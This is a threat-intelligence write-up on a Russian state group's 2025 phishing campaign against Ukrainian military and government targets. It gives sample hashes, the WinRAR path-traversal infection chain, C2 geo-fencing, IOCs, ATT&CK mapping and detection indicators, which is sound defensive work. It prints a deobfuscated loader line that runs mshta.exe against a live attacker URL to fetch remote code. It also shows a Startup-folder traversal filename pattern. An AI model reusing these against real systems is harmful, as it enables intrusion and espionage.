Inside Gamaredon 2025: Zero-Click Espionage at Scale

Campaign Summary

Timeframe: February – November 2025
37 analyzed samples
New zero-click infection vector -> CVE-2025-6218
New C2 architecture: DynDNS + Fast-Flux + Telegram + graph.org
Two-stage geo-fencing + header firewall
Pteranodon as the central Stage-2 loader
Server-side registration required for deeper payload access

As the year slowly crawls toward its inevitable end (like certain Russian infrastructure), it’s a good moment to take another detailed look at Gamaredon’s ongoing phishing campaign targeting Ukraine.

I’ve previously published a high-level overview of this campaign, you can check that article out if you want the “lite” version.
Today, however, we’re digging deeper: how to untangle the FSB’s infrastructure for this operation and how we managed to extract additional payloads directly from their servers with varying degrees of cooperation from Microsoft’s RAR parser.

A quick thank-you goes out to my brother Ramon, who assisted especially in retrieving additional payloads from Gamaredon’s backend. Family bonding through state-sponsored malware analysis, truly heartwarming.

Dataset Overview

For this analysis, I organized all samples into a structured table divided into Stage-1 and Stage-2 to Stage-X artifacts.

Stage-1 samples are the actual phishing attachments delivered to victims (HTA, LNK, RAR archives).
Stage-2 to Stage-X samples represent everything the Gamaredon infrastructure subsequently downloads once the initial loader executes or the vulnerability is triggered.

Each entry contains:

Filename: original name taken from the email attachment or payload
Hash: SHA-256 fingerprint for verification
Dropped Files: anything extracted or written by the sample (HTA/PS1 loaders, Pteranodon modules, persistence scripts, etc.)

This allows us to map the infection chain fully, from the very first email to the deeper payload ecosystem sitting behind Gamaredon’s firewall-like C2 logic.

In total, we analyzed 37 samples for this write-up.

Stage 1 Samples (Click to open)

Stage 2-X Samples

Sample	Hash	Drops
Dropper-Sample-1.hta	9b14d367c99b7d9187a58406ad3eb55e2dee12b4b2bc341f9058c622b7b87fa3	Dropper-Sample-1.1.ps
Dropper-Sample-1.1.ps	f1a52573d11b3bee874e7d29c15d952492e2f4a72e2213fdb9274d0555d90978	Lockdown-Script-Sample-1.ps
Lockdown-Script-Sample-1.ps	9627415eafc3be2756d73b4440372fc99e99e25cd53c012ffccdc5d35ce0f70b
Dropper-Sample-2.hta	9fc2a247313b078d795419b7d1c7c0cd907a103a4c64ebab6c96ddb7b958d230	Dropper-Sample-2.1.hta
Dropper-Sample-2.1.hta	7f467084343ca7986a188108390c1de3c98bb211e304cc4bc700125c1ea495f6	Wiper-Sample-1.ps
Wiper-Sample-1.ps	d4b5e0b45eab241ef03b64f0a52929fdd15e8ef783e1c7952ba01b199e4e3932
94298febd57718f0e05e61c9966f95347598e7ba1a05a48b8c9f9151023a839a.base64	94298febd57718f0e05e61c9966f95347598e7ba1a05a48b8c9f9151023a839a	008af94fd04c55582d9d8d6547f1276c04523494b25e7ff8f8f1bdc444abf1e7
aa572532ab1c8a731e7ba32e97ba180268eee8e6a74a2b9c4dc3efb669edb9af.ps	aa572532ab1c8a731e7ba32e97ba180268eee8e6a74a2b9c4dc3efb669edb9af

Operational Objective of the Campaign

The analyzed artifacts make the intention behind this operation painfully clear:
the campaign is aimed squarely at Ukrainian military, governmental, political, and administrative entities.

Based on filenames, document themes, and sender infrastructure, Gamaredon’s operational goals can be summarized as follows:

Military intelligence collection (documents, internal communication, location data, organization charts)
Rapid exfiltration (Pteranodon immediately sends host-, user-, and system-metadata to the C2)
Long-term espionage (stealers, wipers, tasking modules, USB spreaders)
Disruption & anti-forensics (registry cleaning, MRU deletion, startup folder cleanup)
Targeted propagation inside internal networks (USB/NAS/network spread)

This is not an opportunistic campaign. It is a structured, military-oriented espionage and sabotage operation consistent with, and likely coordinated by Russian state intelligence.

Campaign Timeline

Campaign Description

Gamaredon continues to bombard Ukrainian organizations with phishing emails, using a rotating set of attachments and themes.
The filenames of the analyzed samples strongly indicate military and political targeting, and the underlying infrastructure is built on large DynDNS farms and Fast-Flux C2 nodes an architecture that screams “FSB budget optimization,” if you will.

Until early November 2025, the group primarily distributed HTA and LNK attachments.
Then they shifted strategy, adopting a new Windows vulnerability CVE-2025-6218, allowing infections without the victim consciously executing anything.

Their new favorite delivery vector?
RAR archives containing seemingly harmless documents.

What happens?

When a victim opens the RAR archive:

the vulnerability triggers immediately
a hidden HTA is extracted straight into the Windows Startup folder
reboot -> automatic execution -> connection to Gamaredon’s C2
further payloads are downloaded and initial reconnaissance begins

A classic example of Microsoft doing Microsoft things.

Infection Chain (CVE-2025-6218 & CVE-2025-8088)

The multi-stage infection chain used in this campaign is simple, elegant, and annoyingly effective.
A key component is the server-side access control logic, which tightly restricts who is allowed to receive further payloads, ensuring that analysts outside the target region receive nothing but empty responses and existential frustration.

1. Initial Access: Web-based Loaders

Entry points include:

HTA attachments
LNK droppers
RAR archives containing HTA or LNK files
And increasingly:
- RAR archives exploiting CVE-2025-6218 and CVE-2025-8088

CVE-2025-6218

Vulnerability allowing automatic file extraction into privileged directories
HTA placed into Startup without user execution

CVE-2025-8088

MSHTML execution bypass, circumventing Windows 11 hardening

All these delivery formats share one purpose:
download and launch Pteranodon, the central stage-2 loader.

2. Pteranodon Loader

Once the initial dropper executes, it fetches Pteranodon via HTTP(S).
This is where Gamaredon’s C2 firewall kicks in.

Persistence Mechanisms

Pteranodon uses multiple persistence vectors depending on available permissions:

Registry Run keys (HKCU and occasionally HKLM)
Scheduled tasks (5 – 30 minute intervals)
HTA files in the Startup folder
Hidden script copies inside %APPDATA%, %LOCALAPPDATA%, and %PROGRAMDATA%

These ensure the loader survives multiple reboots and can continuously request new tasks and modules.

Communication Structure

Gamaredon’s C2 traffic is distinctive:

XOR + Base64 layering
Pseudo-JSON structures (loose key/value pairs)
Regular tasking requests (download payload, run wiper, USB spread, resend systeminfo)
Operator fingerprints (recurring variable names and patterns)

Pteranodon is intentionally simple, lightweight, and extremely flexible, the malware equivalent of a Russian Lada:
It may look primitive, but you’ll be surprised how long it keeps going.

3. Access Control Logic (C2 Firewall)

Gamaredon uses a multi-layered filtering system that serves as both OPSEC and anti-analysis defense.

Purpose of the Access Control Logic

The C2:

only responds fully to Ukrainian IP ranges
verifies browser headers
requires system registration before delivering deeper payloads

This effectively locks out researchers, sandboxes, cloud instances, and… pretty much everyone except the intended victims.

Stages

Stage 1: IP Validation

Non-Ukrainian IP -> HTTP 200 with empty body
Ukrainian IP -> proceed

Stage 2: Header Validation

Must supply correct:
- Identifier/Token
- User-Agent
- Accept-Language

Invalid -> serve a 0-byte file
Valid -> proceed

Stage 3: Registration & Tasking

Full payload access only after system registration:

hostname
username
local IP
environment
token

Then the C2 provides:

USB/network spread modules
Wipers
Persistence modules
Stealers
Additional droppers

The basic access control logic looks like this:

4. Campaign Characteristics

Strict Ukraine-only geo-fencing
Strong anti-analysis (empty responses instead of errors)
High variation of initial access files
Consistent use of Pteranodon
Increased abuse of RAR + CVE-2025-6218
Multiple drops per day

Analysis

This article focuses more on mapping the infrastructure than on deep reverse-engineering.
If you want in-depth Stage-1 payload analysis, check my previous article.

Once the malicious attachment is executed, it contacts a remote Gamaredon domain and retrieves Pteranodon.

Key observations from sandboxing

Most sandbox environments receive empty responses, expected due to the C2 filtering
Simulating headers alone is insufficient
Regular Ukrainian proxies also fail
Rotating Ukrainian residential proxies do work
However, deeper stages require successful registration, which makes automated extraction time-consuming

After bypassing the filters, we obtained obfuscated HTAs containing Base64-encoded PowerShell.

These loaders then fetch:

Pteranodon
wiper modules
auxiliary droppers
etc.

All files are provided in the sample table for further analysis.

Telegram & graph.org C2 Distribution

Gamaredon uses:

Telegram channels for rotating C2 IPs and cryptographic material
graph.org pages for rotating payload URLs

Both platforms are:

ideal for operations requiring frequent updates
highly resilient
hard to take down

https://graph.org/vryivzphxwc-11-11

I built a tracker that extracts and publishes these rotating IPs, domains, and secrets to GitHub daily, you can access it here.

Fast-Flux Infrastructure (194.67.71.0/24)

One IP stood out: 194.67.71.75, belonging to REG.RU, a well-known high-abuse Russian hosting provider.

Findings:

200+ IPs in the subnet engaged in coordinated port-scanning against Ukrainian targets (April 2025)
44,157 PassiveDNS entries for the 256 hosts
39,903 unique domains
Typical Fast-Flux characteristics:
- extremely short TTL
- rapid IP rotation
- each IP hosting dozens of unrelated domains
- low-quality disposable domain patterns
- consistent abusive behavior

This subnet is:

clearly Russian-controlled
used for offensive operations
structurally similar to GRU-affiliated infrastructure
highly likely to be connected directly or indirectly to the FSB

I built a graph on VirusTotal to visualize the malware distribution by the subnet:

Changes in the 2025 Gamaredon Campaign

Compared to 2021 – 2024, the 2025 operation shows significant evolution:

1. Zero-Click via CVE-2025-6218

RAR-based exploit allows silent execution with no user interaction.

2. RAR-First Delivery

RAR replaced HTA/LNK as the primary attachment format.

3. More complex access control

Geo-fencing, header checks, registration tokens, and multi-stage filtering.

4. Decentralized C2

Heavy reliance on Telegram + graph.org.

5. Expanded Stage-1 variations

HTA, LNK, RAR+LNK, RAR+HTA, RAR exploiting CVE-2025-6218.

6. Stronger persistence & propagation

Better registry/task persistence and more aggressive lateral movement.

Summary

The 2025 Gamaredon campaign is no longer just “phishing with extra steps”
It has evolved into a modular, highly dynamic, multi-infrastructure malware ecosystem, powered by:

Zero-click exploits
Geo-fenced C2 delivery
Fast-Flux DNS
Telegram distribution
graph.org rotation
Persistent Pteranodon loaders

…all wrapped in a design philosophy best described as:
“If it works, ship it, if it breaks, wrap it in Base64 and ship it anyway.”

MITRE ATT&CK Mapping

The current Gamaredon campaign maps to a wide range of relevant MITRE ATT&CK techniques.
Below is a consolidated overview of the most important tactics and techniques observed during the various stages of the operation: (Click To Open)

TA0001 – Initial Access

T1566.001 – Phishing: Spearphishing Attachment
Distribution of HTA, LNK, and RAR attachments using thematically relevant document names.

T1204.002 – User Execution: Malicious File
Execution of HTA/LNK loaders, or automatic execution via CVE-2025-6218.

TA0002 – Execution

T1059.005 – Command and Scripting Interpreter: Visual Basic
Extensive use of HTA and VBScript for initial loader execution.

T1059.001 – Command and Scripting Interpreter: PowerShell
Used to download and run Pteranodon modules.

T1203 – Exploitation for Client Execution
CVE-2025-6218 enabling automatic HTA placement and execution (zero-click).

TA0003 – Persistence

T1547.001 – Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Persistence achieved via HTA scripts placed in the Startup folder and registry autostarts.

T1053.005 – Scheduled Task/Job
Creation of scheduled tasks that periodically re-execute Pteranodon or supplemental scripts.

TA0004 – Privilege Escalation

(No explicit privilege escalation techniques observed; Gamaredon typically operates under user-level permissions.)

TA0005 – Defense Evasion

T1027 – Obfuscated/Encrypted Files and Information
Heavy use of BASE64 and XOR layers to obfuscate code and communications.

T1497 – Virtualization/Sandbox Evasion
C2 access-control (IP/header validation) to prevent payload delivery to researchers or sandboxes.

T1070 – Indicator Removal on Host
Wiper/cleanup scripts remove MRUs, registry traces, and startup entries.

TA0006 – Credential Access

(Seen in earlier Gamaredon campaigns; less prominent in 2025.)
T1552.001 – Unsecured Credentials: Credentials in Files
Some modules harvest document contents and autocomplete data.

TA0010 – Exfiltration

T1041 – Exfiltration Over C2 Channel
Hostnames, usernames, system metadata, and environment details sent directly to C2.

TA0011 – Command and Control

T1071.001 – Application Layer Protocol: Web Protocols
C2 communication over HTTP/HTTPS.

T1102.002 – Web Service: Telegram
Use of Telegram channels for dynamic IP rotation and distribution of secrets/tokens.

T1102 – Web Service (graph.org)
Use of graph.org pages for periodically rotating payload URLs.

T1568.002 – Dynamic DNS
Frequent use of DynDNS for rotating C2 domains.

T1090 – Proxy
Fast-Flux infrastructure in subnet 194.67.71.0/24 used to proxy malicious infrastructure.

TA0009 – Collection

T1119 – Automated Collection
Immediate collection of system information after Pteranodon’s initial registration.

TA0008 – Lateral Movement / Propagation

T1091 – Replication Through Removable Media
USB-based propagation (a long-standing Gamaredon tactic).

T1021 – Remote Services (limited)
Some modules show capability for internal network spread.

High-Level Indicators for Threat Hunters

This section summarizes the most important behavioral indicators that SOCs, threat hunters, and CERT teams can use to detect Gamaredon activity early.
These are high-level detection patterns rather than sample-specific IOCs

1. Network Indicators

HTTP requests from mshta.exe or powershell.exe to DynDNS domains, graph.org pages, or Ukrainian/Russian subnets
Repeated GET requests resulting in 0-byte responses
Outbound traffic to 194.67.71.0/24 (REG.RU Fast-Flux cluster)
Unexpected connections to Telegram API/channels without active user sessions
Very low DNS TTL values for domains rotating across many IPs

2. File System Indicators

Presence of suspicious script files:

HTA/VBS in the Startup folder:
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\*.hta
Dropped PowerShell/VBS files in:
- %APPDATA%
- %LOCALAPPDATA%
- %PROGRAMDATA%
Files with pseudo-legitimate names such as Update.hta, Sync.hta, etc.

3. Registry Indicators

New or unusual autostart entries in:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\Software\Microsoft\Windows\CurrentVersion\Run

Suspicious values like:
SystemUpdate, WinService, TaskHost, MSConfigSync

4. Process Indicators

Suspicious execution of:

mshta.exe
wscript.exe
cscript.exe
powershell.exe

Especially when combined with:

obfuscated arguments
Base64-encoded payloads
long XOR/Chr() sequences
inline HTTP URLs

5. Anti-Analysis / Sandbox Indicators

Malware returns completely empty responses when contacted from non-Ukrainian IPs
Stage loaders delivering 0-byte payloads when no registration token is provided
Behavior drastically changes depending on IP region and C2 validation

6. Tactical Patterns

Multiple execution stages within a very short timeframe
Frequent contact with newly generated DynDNS domains
Appearance of new graph.org pages containing short random identifiers
Telegram messages containing random Base64 blobs representing rotating secrets/IPs

7. Runtime Indicators (Sysmon/SOC)

Event ID 11 – file creation within Startup folder

Event ID 1 – mshta.exe -> powershell.exe -> network connection

Event ID 3 – outbound network connections from mshta.exe or powershell.exe

Event ID 7 – unexpected script engine DLL loads

IOCs

In our Analysis we could find the following IOCs used in this campaign:

IOC-Type	IOC-Value
DynDNS Payload Delivery Server	acess-pdf.webhop.me
	creates.webhop.me
	digitall.webhop.me
	dears.serveirc.com
	dilopendos.serveirc.com
	downcraft.serveirc.com
	fixer.serveirc.com
	fixfactors.serveirc.com
	kia-court.serveirc.com
	political-news.serveirc.com
	readers.serveirc.com
	serversftp.serveirc.com
	ssu-procuror.redirectme.net
	yeard.serveirc.com
	papilonos.hopto.org
	diskpart.myddns.me
	selodovo.myddns.me
	document-downloads.ddns.net
	systems-debug.ddns.net
	document-prok.freedynamicdns.org
	downloads-document.freedynamicdns.org
	write-document.freedynamicdns.org
	procurature.freedynamicdns.org
	print-documents.freedynamicdns.net
	google-pdf.redirectme.net
	hosting-redirect.sytes.net
	tillthesunrise.sytes.net
	open-files.systes.net
	open-pdf.serveftp.com
	pasive-host.gotdns.ch
Cloudflare	app-334825a6-4a2b-48bc-be92-e0582d656006.cleverapps.io
	libraries-thus-yale-collaborative.trycloudflare.com
	vacations-mic-games-scale.trycloudflare.com
	incidence-polished-expires-denver.trycloudflare.com
	streams-metallic-regulatory-armor.trycloudflare.com
	divine-water-36e7.5ekz2z6pjk.workers.dev
	long-king-02b7.5ekz2z6pjk.workers.dev
	quietunion.48clhonm1m.workers.dev
	divine-water-5123.svush66274.workers.dev
	blackvoice.lydef24298.workers.dev
	vaporblue.ddnsking.com
Domains	rqzbuwewuvnbbaucfhjl.supabase.co
	For.estaca.ru
	exorcise.me
	andonceagain.online
	gihs.andonceagain.ru
	andonceagain.ru
	antresolle.ru
IP Adresses	5.181.2.158
	5.181.2.161
	95.163.236.162
	185.168.208.228
	194.58.66.5
	194.58.66.132
	194.58.66.192
	194.67.71.75
	194.87.240.141
	194.87.230.166
	194.87.240.215
	194.87.240.217
	185.39.204.82
	45.141.234.234
	5.8.18.46
	103.224.182.251
	144.172.84.70
	45.32.220.217
	65.38.120.43
	64.7.199.177
	172.104.206.42
	107.189.18.173
	107.189.23.61
Telegram URLs	https://www.telegram.me/s/natural_blood
	https://www.telegram.me/s/oberfarir
	https://telegram.me/s/teotori
URLs	/gss_11.11.2025/kidneyfih/broadlyrQZ.pdf
	/gpd_07.11.2025r/disputeqG1/concealedn2N.pdf
	/moss_10.11.2025/futureHtG/accountc7z.pdf
	/SUU_11.11.2025/dicontentedOhr/scoundrelit1.pdf
	/SVrr_12.11.2025/crookoxQ/learningB4J.pdf
	/mmoUU_13.11.2025/evolutionKPm/armourV2P.pdf
	/sss_10.11.2025/dialGsd/horribleNQx.pdf
	/ss_07.11.2025/flashlightsK8Q/pondjsQ.pdf
	/motherrDJ/ssu/flowerbedD6M/dressmakerpvv.pdf
	/sprdvth/tailor.ps1
	/regretxso/GP4/investigationer4/exhibtionLD6.pdf
	/OD/sensationaSL/AprilcWs.jpeg
	/SS/atomN2s/arwardU26.jpeg
	/OD/remisshKY/consentedjtP.jpeg
	/OD/quitzU2/comparativelyNWU.jpeg
	/Gost/pitchedcbY/intenseLKt.jpeg
	/GPuUkr/satALU/eventfulpNq.pdf
	/prosperousd92/allowingclO
	/prosperousd92/allowingclO
Documents	додаток.doc
	дск.doc
	доповідна запискa.doc
	супровід катування.doc
	лист до.doc
	убд.doc
	наказ наряд.doc
	ГУР МОУ.doc
	згвалтування.doc
	супровод.doc
	обезголовлення військовополоненого.jpeg
	обезголовлення українського військовополоненого.jpeg
	згвалтування військових.jpeg
	фото секс.jpeg

How a Russian Threat Actor Uses a Recent WinRAR Vulnerability in Their Ukraine Operations

How a Russian Threat Actor Uses a Recent WinRAR Vulnerability in Their Ukraine Operations

Today we’re taking a look at several malware samples from the advanced persistent threat group “Primitive Bear” aka “Gamaredon”.

Primitive Bear is a Russian state-sponsored Advanced Persistent Threat (APT) group that has been active since at least 2013. With high confidence, the group is attributed to the Federal Security Service of the Russian Federation (FSB), Russia’s domestic intelligence service.

The most recently circulating malware samples caught my attention because they all follow the same pattern and exploit a newly disclosed vulnerability CVE-2025-6218 to load additional malware in later stages.

In this post, I want to walk you through the methodology and the infrastructure used by the attacker.

Below is an overview of the samples I analyzed that make use of CVE-2025-6218, along with their origin.
I will continue analyzing additional samples in order to map the attacker’s infrastructure as comprehensively as possible.

Samples leveraging CVE-2025-6218

Click here to open table

Filename	Hash (SHA256)	Sources	File Type
Повістка про виклик_357-16230-25_24.10.2025.pdf	7e7cdaac7a508b43d0971c92c72517a93f2dabdc0b91b7e4250bc4f672158bfc	Malware Bazaar	ASCII text
Повістка про виклик_357-16230-25_24.10.2025.pdf:.._.._.._.._.._.._AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_357-16230-25_24.10.2025.HTA	fe3c9988490f950ed0d34d807664161bd90ef4e981e314f5a62e37cdd2cc2127	Malware Bazaar	hta text/html

Щодо надання інформації (військова частина А0135_11-967_11.11.2025).pdf	5aea8e8fa381092e9e72f8674254ea35c885562f9e94617c610102034f21d17e	Malware Bazaar	ASCII text
Щодо надання інформації (військова частина А0135_11-967_11.11.2025).pdf:.._.._.._.._.._.._AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_11-967_11.11.2025.HTA	74c2e95feea3c8a33be654925b3ae93ef7dc9c0b52a853d2230f88fbeda525f4	Malware Bazaar	hta text/html

Перегляд підходів до призову під час мобілізації_2-3716-25_07.11.2025.pdf	0e0d2d2d286e835e13464c87bb70209aaea32994d916aa0bfbb10e2a391b8afc	Malware Bazaar	ASCII text
Перегляд підходів до призову під час мобілізації_2-3716-25_07.11.2025.pdf:.._.._.._.._.._.._AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_2-3716-25_07.11.2025.HTA	d101aff41ca5ead86bd9dfd53b4969e69ab31ae5ca31cf27ed44b90d66b9625a	Malware Bazaar	hta text/html

Запит на отримання інформації командира військової частини А0135_11-967_10.11.2025.pdf	76884bb1338372a61b99fcb6f3a302d5260ced3292d012063ff5f20e0fb62474	Malware Bazaar	ASCII text
Запит на отримання інформації командира військової частини А0135_11-967_10.11.2025.pdf:.._.._.._.._.._.._AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_11-967_10.11.2025.HTA	0716db7ad22fc3f039848f0bd2ea3b8efaa8ad6b2e1ea4475631fc6e317d3d2b	Malware Bazaar	hta text/html

Передати засобами АСУ Дніпро_2_1_1_7755_11.11.2025.pdf	fc2cd4345ed345c16f627d0c75ffea0b9090b856ca43078810fa2635ff662dc5	Malware Bazaar	ASCII text
Передати засобами АСУ Дніпро_2_1_1_7755_11.11.2025.pdf:.._.._.._.._.._.._AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_2_1_1_7755_11.11.2025.HTA	18c7bfe2ac5dc6f971af5a1b43da1377f6bf25239c073a1950885858e5fb5734	Malware Bazaar	hta text/html

Передати засобами АСУ Дніпро_2_1_1_7755_12.11.2025.pdf	04cf7d194a9f3deb0e9e3c9232e09c47185faeebbf8ff8932e55fa8ce054d2a9	Malware Bazaar	ASCII text
Передати засобами АСУ Дніпро_2_1_1_7755_12.11.2025.pdf:.._.._.._.._.._.._AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_2_1_1_7755_12.11.2025.HTA	49c57c4d29ac80690be8b12f45c678d150fe93ced4e047290f890aa9aa01d504	Malware Bazaar	hta text/html

Передати засобами АСУ Дніпро_3_8_2_7442_13.11.2025.pdf	4ce83c4209c55111c69b1c2506a7496068be56e5e507eac8f23e9e04cf901f65	Malware Bazaar	ASCII text
Передати засобами АСУ Дніпро_3_8_2_7442_13.11.2025.pdf:.._.._.._.._.._.._AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_3_8_2_7442_13.11.2025.HTA	5c93b9b1fe5de1838c67941176851f5ab4222b2f6e75ef3c8312c15f2bcffecb	Malware Bazaar	hta text/html

Передати засобами АСУ Дніпро_2_7_4_62_13.11.2025.pdf	7d3d917380c37b08d3420567e318e1733eacef024125ba3969228a94694a4eec	Malware Bazaar	ASCII text
Передати засобами АСУ Дніпро_2_7_4_62_13.11.2025.pdf:.._.._.._.._.._.._AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_2_7_4_62_13.11.2025.HTA	bbd91d4294000198a5cc71a722d3d67f73896f21aafc97de374365a513397c7c	Malware Bazaar	hta text/html

The campaign I observed clearly targets Ukrainian entities, something we can identify mainly by the filenames used:

Original Filename	English Translation
Повістка про виклик_357-16230-25_24.10.2025.pdf	Subpoena_357-16230-25_24.10.2025.pdf
Щодо надання інформації (військова частина А0135_11-967_11.11.2025).pdf	Regarding the provision of information (military unit A0135_11-967_11.11.2025).pdf
Перегляд підходів до призову під час мобілізації_2-3716-25_07.11.2025.pdf	Review of approaches to conscription during mobilisation_2-3716-25_07.11.2025.pdf
Запит на отримання інформації командира військової частини А0135_11-967_10.11.2025.pdf	Request for information from the commander of military unit A0135_11-967_10.11.2025.pdf
Передати засобами АСУ Дніпро_2_1_1_7755_11.11.2025.pdf	Transfer via automated control system Dnipro_2_1_1_7755_11.11.2025.pdf
Передати засобами АСУ Дніпро_2_1_1_7755_12.11.2025.pdf	Transfer via automated control system Dnipro_2_1_1_7755_12.11.2025.pdf
Передати засобами АСУ Дніпро_3_8_2_7442_13.11.2025.pdf	Transfer via automated control system Dnipro_3_8_2_7442_13.11.2025.pdf
Передати засобами АСУ Дніпро_2_7_4_62_13.11.2025.pdf	Transfer via automated control system Dnipro_2_7_4_62_13.11.2025.pdf

Primitive Bear is well-known for its spear-phishing operations, so none of this is surprising. What is new, however, is the use of RAR archives to load additional malware.
Unfortunately, we cannot definitively identify all recipients of these samples, but the filenames give us a pretty good idea of who they were intended for:

File	Probable recipient / Context	Derived from the name
Повістка про виклик_357-16230-25_24.10.2025.pdf	Authorities/judiciary or territorial recruitment centers (ТЦК та СП) for mobilization	“Повістка” can mean court/investigative authority or military summons.
Щодо надання інформації (військова частина А0135_11-967_11.11.2025).pdf	Military Unit A0135 (Військова частина А0135)	explicit mention of the unit
Перегляд підходів до призову під час мобілізації_2-3716-25_07.11.2025.pdf	Mobilization/personnel offices: ТЦК та СП, Mobilization Department in the MoD/General Staff	Thematic focus: “Approaches to convening”
Запит на отримання інформації командира військової частини А0135_11-967_10.11.2025.pdf	Commander of military unit A0135	explicitly addressed
Передати засобами АСУ Дніпро_2_1_1_7755_11.11.2025.pdf	Positions with access to “АСУ Днепр” (АСУ = Automated Management/Information Systems) This is typically MoD/ТЦК/Human Resources	“Transmit via ASU Dnipro” -> internal administration/data channel
Передати засобами АСУ Дніпро_2_1_1_7755_12.11.2025.pdf	as above	Series/sequel document (different date)
Передати засобами АСУ Дніпро_3_8_2_7442_13.11.2025.pdf	as above	other internal classification/filing codes
Передати засобами АСУ Дніпро_2_7_4_62_13.11.2025.pdf	as above

Now that we better understand the context of the samples, we can dive into the actual analysis. Since all samples share a nearly identical structure, we’ll look at the most recent one found, with the hash 237696ecc370688a8d1894eb2f95af53a3c0f8d42eb540b7f529b4d4f4492bc0

The victim receives a RAR archive containing two files: a fake PDF and a HTML Application (HTA).
The HTA file always has the same bizarre naming scheme:

<CUSTOM FILENAME>.pdf:.._.._.._.._.._.._AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_<HTA FILE>.hta

This immediately reveals the exploitation of CVE-2025-6218.

The vulnerability is a critical directory traversal -> remote code execution (RCE) flaw in WinRAR (up to version 7.11) on Windows.
The bug lies in how RAR archives process file paths: an attacker can craft an archive entry that writes files outside the intended extraction folder e.g., directly into the user’s Startup directory.

Once a file lands in an auto-executed location, it runs on next login or reboot, resulting in RCE with the current user’s privileges.
It still requires user interaction, such as opening a malicious archive.
The issue is fixed in WinRAR 7.12 (Beta 1) and later.

If you want to get a feeling for the vulnerability, a PoC is definitely worth looking at.

So what actually happens when the victim opens the RAR file?

The user opens the archive.
The archive extracts a .pdf into the current directory.
The archive silently extracts an .hta containing obfuscated VBScript into the Startup folder.
After reboot, the VBScript fetches additional malware.

It’s worth noting that the exploitation of CVE-2025-6218 requires only minimal user interaction. In most cases, the victim merely has to open the malicious RAR archive.
No special system configuration is required, no sandbox needs to be disabled, and no “advanced mode” must be enabled. WinRAR’s default extraction behavior is sufficient for the path traversal to write an HTA file directly into the user’s Startup folder.

long story short: the attacker relies only on the victim doing what victims do best, double-clicking whatever lands in their inbox.

Now let’s take a look at what such an HTA file actually looks like:

We see an obfuscation attempt that is, let’s put it politely, more bad than good.
Between the actual payload there’s a lot of junk lines:

These can be filtered out easily by looking at each assigned variable. If a variable never gets used or only references itself, it can be safely removed.
I did the cleanup manually, because the scripts are tiny and the obfuscation is by no means a masterpiece.

After removing the junk lines and renaming the important variables, I ended up with the following result:

The entire deobfuscation process took about five minutes. The script isn’t complex, so let’s walk through it.

Script Execution Flow

1. It creates a WScript.Shell instance

Set wshell = CreateObject("WScript.Shell")

2. It defines the payload command

payload = "WScript.Shell %WINDIR%\system32\mshta.exe http://president.gov.ua@readers[.]serveirc[.]com?/gSS_11.11.2025/kidneyfih/broadlyrQZ.pdf"

The string pretends to be a legitimate Windows component.

Using mshta.exe is classic: this Windows binary can directly execute remotely hosted HTA/HTML scripts, a typical Living-off-the-Land Binary (LOLBIN) abuse.

The URL

http://president.gov.ua@readers.serveirc.com?/gSS_11.11.2025/kidneyfih/broadlyrQZ.pdf

uses a phishing-like trick:

president.gov.ua@ looks like an official Ukrainian domain
the real host is readers.serveirc.com, a free DynDNS subdomain acting as C2 or malware hosting server.

3. It executes the payload silently

wshell.Run payload

4. Error suppression

On Error Resume Next

Runtime errors are ignored to avoid crashes or prompts.

5. It closes itself

Close

The script exists purely as a loader/downloader. No real payload is inside, instead it fetches the actual malware (another HTA, VBS, or EXE) from readers.serveirc.com.

This aligns perfectly with Primitive Bear’s usual TTPs:

multi-stage payload chains ending in backdoors for surveillance and exfiltration (e.g., Pteranodon, GammaLoad)
abuse of Windows-native binaries (mshta.exe, wscript.exe)
phishing documents themed around Ukrainian government topics (e.g., “повістка.pdf”)
fast-changing C2 infrastructure on free DNS services (serveirc.com, myftp.biz, ddns.net)

Primitive Bear’s operations often end in the deployment of modular backdoors such as Pteranodon or GammaLoad, both of which are staples of the group’s espionage toolkit:

Pteranodon: A long-running backdoor family used by Primitive Bear since at least 2016. It supports classic cyber-espionage features such as screenshot capture, file exfiltration, keystroke logging, command execution, and staged payload delivery. Modular, noisy, but effective enough for long-term access.
GammaLoad: A lightweight downloader/backdoor frequently used as the “next stage” after initial compromise. Typically retrieves secondary modules, maintains C2 connectivity, and prepares the system for more persistent implants. Often deployed through simple LOLBIN-based loaders (like the one used here).

Nothing revolutionary, just FSB’s usual grab-bag of surveillance toys 😉

Infrastructure used in the 2025 Ukraine Campaign (so far)

Throughout my analysis, I reviewed a large number of recent samples (October – November) from this threat actor. Below is a summary and visualization of the infrastructure I identified.

Used Domains & IPs in threat campaign

IP-Address	Associated Domain
194.58.66.132	document-downloads.ddns.net
“”	print-documents.freedynamicdns.net
“”	google-pdf.redirectme.net
“”	document-prok.freedynamicdns.org
“”	downloads-document.freedynamicdns.org
“”	write-document.freedynamicdns.org
“”	backup.9fvzesn.us
“”	diskpart.myddns.me
194.87.230.166	readers.serveirc.com
“”	yeard.serveirc.com
“”	dears.serveirc.com
“”	fixer.serveirc.com
“”	dilopendos.serveirc.com
194.87.240.215	readers.serveirc.com
“”	dilopendos.serveirc.com
“”	political-news.serveirc.com
“”	serversftp.serveirc.com
“”	digitall.webhop.me
“”	creates.webhop.me
“”	acess-pdf.webhop.me
“”	hosting-redirect.sytes.net
194.87.240.141	political-news.serveirc.com
“”	digitall.webhop.me
“”	creates.webhop.me
“”	acess-pdf.webhop.me
“”	hosting-redirect.sytes.net
45.141.234.234	acess-pdf.webhop.me
185.39.204.82	open-pdf.serveftp.com
194.58.66.5	pasive-host.gotdns.ch
“”	papilonos.hopto.org
“”	selodovo.myddns.me
“”	systems-debug.ddns.net
“”	admindt.ddns.net
“”	kia-court.serveirc.com
“”	downcraft.serveirc.com
“”	procurature.freedynamicdns.org
“”	ssu-procuror.redirectme.net
“”	procuror.servehttp.com
CloudFlare IP	libraries-thus-yale-collaborative.trycloudflare.com
CloudFlare IP	vacations-mic-games-scale.trycloudflare.com
